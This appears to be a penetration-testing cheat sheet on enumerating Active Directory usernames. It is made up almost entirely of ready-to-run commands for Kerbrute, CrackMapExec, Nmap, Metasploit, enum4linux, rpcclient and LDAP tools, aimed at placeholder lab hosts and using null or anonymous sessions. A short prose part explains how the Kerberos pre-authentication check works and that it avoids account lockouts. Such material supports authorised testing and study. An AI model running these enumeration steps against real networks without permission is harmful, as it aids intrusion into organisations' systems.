Skip to main content

User Enumeration

Kerbrute

To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768 if Kerberos logging is enabled.

kerbrute userenum -d rezydev.local --dc 10.10.10.10 usernames.txt

## Only Output Usernames (with RegEx)
kerbrute userenum -d rezydev.local --dc 10.10.10.10 usernames.txt | grep -oP '(?<=VALID USERNAME:\t )[^@]+'

Crackmapexec

## Credentialed
sudo crackmapexec smb 10.10.10.10 -u rezydev -p Password123@ --users
sudo crackmapexec smb 10.10.10.10 -u rezydev -p Password123@ --users | grep -oP '(?<=\\)[^ \t:]+'
## Extra: We can use --groups to enumerate domain groups.

## SMB NULL Session
crackmapexec smb rezydev.local  -u '' -p '' --users | awk '{print $4}' | uniq

## LDAP Anonymous
crackmapexec ldap 10.10.10.10 --anon --users

Nmap

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" 10.10.10.10

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=usernames.txt 10.10.10.10>

Metasploit

msf> use auxiliary/gather/kerberos_enumusers

enum4linux

# SMB NULL Session is required
enum4linux -U 10.10.10.10 | grep 'user:' | sed 's/user:\[//g' | sed 's/\]//g' | awk '{print $1}'

RPCClient

# SMB NULL Session is required
rpcclient -U "" -N 10.10.10.10
$> enumdomusers # Enumerates the username

LDAP Anonymous

## [LDAPSEARCH]
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName displayName userPrincipalName

## [LDAPDOMAINDUMP]
ldapdomaindump --no-pass -d <DOMAIN> <DC_IP>
cat domain_users.json | jq '.[] | {sAMAccountName, userPrincipalName}'

## [WINDAPSEARCH]
python3 windapsearch.py --dc-ip 10.10.10.10 -u "" -U

## Using PowerShell ([ADSI] Query, if anonymous bind is allowed)
$ldap = New-Object DirectoryServices.DirectorySearcher([ADSI]"LDAP://<DC_IP>")
$ldap.Filter = "(objectClass=user)"
$ldap.PropertiesToLoad.AddRange(@("sAMAccountName", "displayName", "mail"))
$ldap.FindAll() | ForEach-Object { $_.Properties }